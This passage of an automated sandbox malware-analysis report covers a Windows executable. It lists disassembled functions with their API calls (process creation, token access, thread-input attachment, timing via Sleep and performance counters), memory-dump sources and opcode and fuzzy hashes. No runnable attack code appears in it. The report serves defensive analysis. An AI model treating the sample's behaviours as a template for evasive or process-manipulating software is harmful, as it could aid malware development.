                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2880819207-0
                                                                                                                        • Opcode ID: e3db3df1754211324251643689275bbcc2b47c7f379981ce98d257aa06f2b1ba
                                                                                                                        • Instruction ID: f9228a522addcd220c4d3b8949dd09150e0239952a9dc3174e62ce431b5ded72
                                                                                                                        • Opcode Fuzzy Hash: e3db3df1754211324251643689275bbcc2b47c7f379981ce98d257aa06f2b1ba
                                                                                                                        • Instruction Fuzzy Hash: 59110872A09208BFDB02DB68AC08ADA7FADDB48324F144216F565F3251D6708D0887A0
                                                                                                                        Function 00E6C619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E6C657
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00E6C66B
                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E6C675
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3970641297-0
                                                                                                                        • Opcode ID: 22677be22ced9f17bc6946dea0b52082c912bd2e810601792a0ec8b4aa7a6797
                                                                                                                        • Instruction ID: 328d45d118f88a2e25681233c58eb468e553b49faaf29c771de1dac1505d3dbb
                                                                                                                        • Opcode Fuzzy Hash: 22677be22ced9f17bc6946dea0b52082c912bd2e810601792a0ec8b4aa7a6797
                                                                                                                        • Instruction Fuzzy Hash: 7A11A172542549BFDB114FA0EC40EFE7B69FF087A4F155116FA5462010C732DC60DBA4
                                                                                                                        Function 00E949D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E9354D,?,00E945D5,?,00008000), ref: 00E949EE
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E9354D,?,00E945D5,?,00008000), ref: 00E94A13
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E9354D,?,00E945D5,?,00008000), ref: 00E94A1D
                                                                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00E9354D,?,00E945D5,?,00008000), ref: 00E94A50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2875609808-0
                                                                                                                        • Opcode ID: fa8e60314e5c6eb3f082410be9c8e7176591af8e1ac36c863219b6d04e1bee88
                                                                                                                        • Instruction ID: b1cf6e17b88a13a326aa29d448a7309add7e56d95e5372192bbb0deda60f82ce
                                                                                                                        • Opcode Fuzzy Hash: fa8e60314e5c6eb3f082410be9c8e7176591af8e1ac36c863219b6d04e1bee88
                                                                                                                        • Instruction Fuzzy Hash: 20117CB1D4552CEBCF04EFA5ED48AEEBB78FF09711F006046E941B2280DB709551CB99
                                                                                                                        Function 00E85BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3016257755-0
                                                                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                        • Instruction ID: df5a24e953be41fcfe63433d87e00b928f49f05d638eebf068101c79b9bd4c07
                                                                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                        • Instruction Fuzzy Hash: A8014B3300064EBBCF126E88DC41CEE7F62BB58354B589815FA1C69131DA36CAB1AB81
                                                                                                                        Function 00E780E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E7869D: __getptd_noexit.LIBCMT ref: 00E7869E
                                                                                                                        • __lock.LIBCMT ref: 00E7811F
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00E7813C
                                                                                                                        • _free.LIBCMT ref: 00E7814F
                                                                                                                        • InterlockedIncrement.KERNEL32(01142478), ref: 00E78167
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2704283638-0
                                                                                                                        • Opcode ID: 325da6aeab9a99c5adc6b9d36cb85d433e2be865bd4c2c6b36ca4de7517bd629
                                                                                                                        • Instruction ID: a9be7743042ab2f4537fcd708d398c7a22fe10629b14b776199d78d81060493f
                                                                                                                        • Opcode Fuzzy Hash: 325da6aeab9a99c5adc6b9d36cb85d433e2be865bd4c2c6b36ca4de7517bd629
                                                                                                                        • Instruction Fuzzy Hash: B001AD319827119BCB15AB659A0E79973A0BF10B15F44D00AF81CB7291CF345C42EBD2
                                                                                                                        Function 00EBDDEE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00EBDE07
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00EBDE1F
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00EBDE43
                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EBDE5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 357397906-0
                                                                                                                        • Opcode ID: c61b804ab533627cc691c4e3baf4dc10f8768b74cf641463c9ed760f0df3f0d1
                                                                                                                        • Instruction ID: 494ba60be46059353be82855ac153f76fd36ed894ef5e7f5c6a8fb3b59513a57
                                                                                                                        • Opcode Fuzzy Hash: c61b804ab533627cc691c4e3baf4dc10f8768b74cf641463c9ed760f0df3f0d1
                                                                                                                        • Instruction Fuzzy Hash: 951120B9D04209EFDB41DF99D8849EEBBF9FB08310F108166E925E3214D735AA55CF90
                                                                                                                        Function 00EBE13E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EBE14D
                                                                                                                        • _memset.LIBCMT ref: 00EBE15C
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F13EE0,00F13F24), ref: 00EBE18B
                                                                                                                        • CloseHandle.KERNEL32 ref: 00EBE19D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3277943733-0
                                                                                                                        • Opcode ID: 20607fad3e80f0aa855da193107c8ef2a416e41147872c6ddbb1a863fc67316a
                                                                                                                        • Instruction ID: cc4cc908fc3a07d66ba6ca13012f466cb14562c10e3ed98e1361f7ec5e41c487
                                                                                                                        • Opcode Fuzzy Hash: 20607fad3e80f0aa855da193107c8ef2a416e41147872c6ddbb1a863fc67316a
                                                                                                                        • Instruction Fuzzy Hash: 17F082F1A41304BFF2105B76AC06FF77AADDB09394F018421BB08F51A2D3B68E01A7A4
                                                                                                                        Function 00E99C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00E99C7F
                                                                                                                          • Part of subcall function 00E9AD14: _memset.LIBCMT ref: 00E9AD49
                                                                                                                        • _memmove.LIBCMT ref: 00E99CA2
                                                                                                                        • _memset.LIBCMT ref: 00E99CAF
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00E99CBF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 48991266-0
                                                                                                                        • Opcode ID: e74ce594d35261d5b4f7c495331c4bd03b187aabee85c4092414b3f6354bf615
                                                                                                                        • Instruction ID: 373536d2232ab4b1d5c28377649dc2eef99cd263c7db593610ba589509a9ebe1
                                                                                                                        • Opcode Fuzzy Hash: e74ce594d35261d5b4f7c495331c4bd03b187aabee85c4092414b3f6354bf615
                                                                                                                        • Instruction Fuzzy Hash: D6F05476201104AFCF016F55EC85A49BB69EF45350F08C062FE086E217C731E815DBF5
                                                                                                                        Function 00EBE83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E6B5EB
                                                                                                                          • Part of subcall function 00E6B58B: SelectObject.GDI32(?,00000000), ref: 00E6B5FA
                                                                                                                          • Part of subcall function 00E6B58B: BeginPath.GDI32(?), ref: 00E6B611
                                                                                                                          • Part of subcall function 00E6B58B: SelectObject.GDI32(?,00000000), ref: 00E6B63B
                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EBE860
                                                                                                                        • LineTo.GDI32(00000000,?,?), ref: 00EBE86D
                                                                                                                        • EndPath.GDI32(00000000), ref: 00EBE87D
                                                                                                                        • StrokePath.GDI32(00000000), ref: 00EBE88B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1539411459-0
                                                                                                                        • Opcode ID: 6cb6175fa0bb650f0ee0fefbd3c43adea153731e26c343a71aa368566a41e14e
                                                                                                                        • Instruction ID: 5a0ed2d130ac91b00c2deda483c79662cc4cfddedee0233683b81aacec92c2e4
                                                                                                                        • Opcode Fuzzy Hash: 6cb6175fa0bb650f0ee0fefbd3c43adea153731e26c343a71aa368566a41e14e
                                                                                                                        • Instruction Fuzzy Hash: DAF0BE31006269BADB162F51BC09FCE3F9AAF06320F048102FA01300E1C3754555DF95
                                                                                                                        Function 00E8D623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E8D640
                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E8D653
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00E8D65A
                                                                                                                        • AttachThreadInput.USER32(00000000), ref: 00E8D661
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2710830443-0
                                                                                                                        • Opcode ID: 4e49268a82e0a1aa8abd1188b0ab32ef675e46e1a639d4660d21431e30f5bff6
                                                                                                                        • Instruction ID: 35a1a30055a29e3c3b4cf3b89941c93379a524618f3b1bd02bb4101ea499a904
                                                                                                                        • Opcode Fuzzy Hash: 4e49268a82e0a1aa8abd1188b0ab32ef675e46e1a639d4660d21431e30f5bff6
                                                                                                                        • Instruction Fuzzy Hash: 45E06D7150A228BEDB212FA2EC0DEDB7F1CEF117B1F008012B51CA50A0DA71D584DBE0
                                                                                                                        Function 00E8BDF8 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00E8BE01
                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E8B9C9), ref: 00E8BE08
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E8B9C9), ref: 00E8BE15
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E8B9C9), ref: 00E8BE1C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3974789173-0
                                                                                                                        • Opcode ID: eba6a73d19abdcf13609c5c62701383c17a6d4056e41a364f4eadf128e3b1c6e
                                                                                                                        • Instruction ID: 6e9fc7f0083fe3ddcffbb310fc48a465aa431610df5faf56048213e12dffa313
                                                                                                                        • Opcode Fuzzy Hash: eba6a73d19abdcf13609c5c62701383c17a6d4056e41a364f4eadf128e3b1c6e
                                                                                                                        • Instruction Fuzzy Hash: 57E086326462119FD7102FB2EC0CB973BA8EF94796F008819F245FA040D7348445C761
                                                                                                                        Function 00E6B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSysColor.USER32(00000008), ref: 00E6B0C5
                                                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00E6B0CF
                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00E6B0E4
                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00E6B0EC
                                                                                                                        • GetWindowDC.USER32(?,00000000), ref: 00ECECFA
                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00ECED07
                                                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00ECED20
                                                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00ECED39
                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00ECED59
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00ECED64
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1946975507-0
                                                                                                                        • Opcode ID: 1033a77be75b01f67aefccb8bf4dc459166a8840d26ff3780a518b2b5b54e74e
                                                                                                                        • Instruction ID: 75c72d2d371265f3dce42609b329e1f58abca26c7afd9ff44c87f0ea5c8c85f4
                                                                                                                        • Opcode Fuzzy Hash: 1033a77be75b01f67aefccb8bf4dc459166a8840d26ff3780a518b2b5b54e74e
                                                                                                                        • Instruction Fuzzy Hash: 8DE06D31105244AEEB211F75FC4DB983F21EB06339F108226F66AB80E2C3724985CB11
                                                                                                                        Function 00ECC0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2889604237-0
                                                                                                                        • Opcode ID: 410132494176f0395f5ff82045dc3471aa06ef1645f18cb0496909e0798f1155
                                                                                                                        • Instruction ID: dc7107e62f155495fc0aa957b98c8da64d6f38f670545f0d3f2debea44b9b88d
                                                                                                                        • Opcode Fuzzy Hash: 410132494176f0395f5ff82045dc3471aa06ef1645f18cb0496909e0798f1155
                                                                                                                        • Instruction Fuzzy Hash: 0BE046B5545204EFDB005F71EC48AA93FE9EB4C3A0F21940AFD5AAB250DAB5D8858F80
                                                                                                                        Function 00E8C066 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E8C071
                                                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00E8C07D
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00E8C086
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00E8C08E
                                                                                                                          • Part of subcall function 00E8B850: GetProcessHeap.KERNEL32(00000000,?,00E8B574), ref: 00E8B857
                                                                                                                          • Part of subcall function 00E8B850: HeapFree.KERNEL32(00000000), ref: 00E8B85E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 146765662-0
                                                                                                                        • Opcode ID: e9c5f8c58f41c88fde70780c20ce6bdac9ca8c9039123d3af9068ad4b49f9d34
                                                                                                                        • Instruction ID: 34d4f1b1eb6438900a5c12fea57746a17484d64d96702ded6c502c1d392e998d
                                                                                                                        • Opcode Fuzzy Hash: e9c5f8c58f41c88fde70780c20ce6bdac9ca8c9039123d3af9068ad4b49f9d34
                                                                                                                        • Instruction Fuzzy Hash: C5E0BF36109006BFCB012FA6ED08859FB6AFF493213104226F62991570CB326435EB50
                                                                                                                        Function 00ECC0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
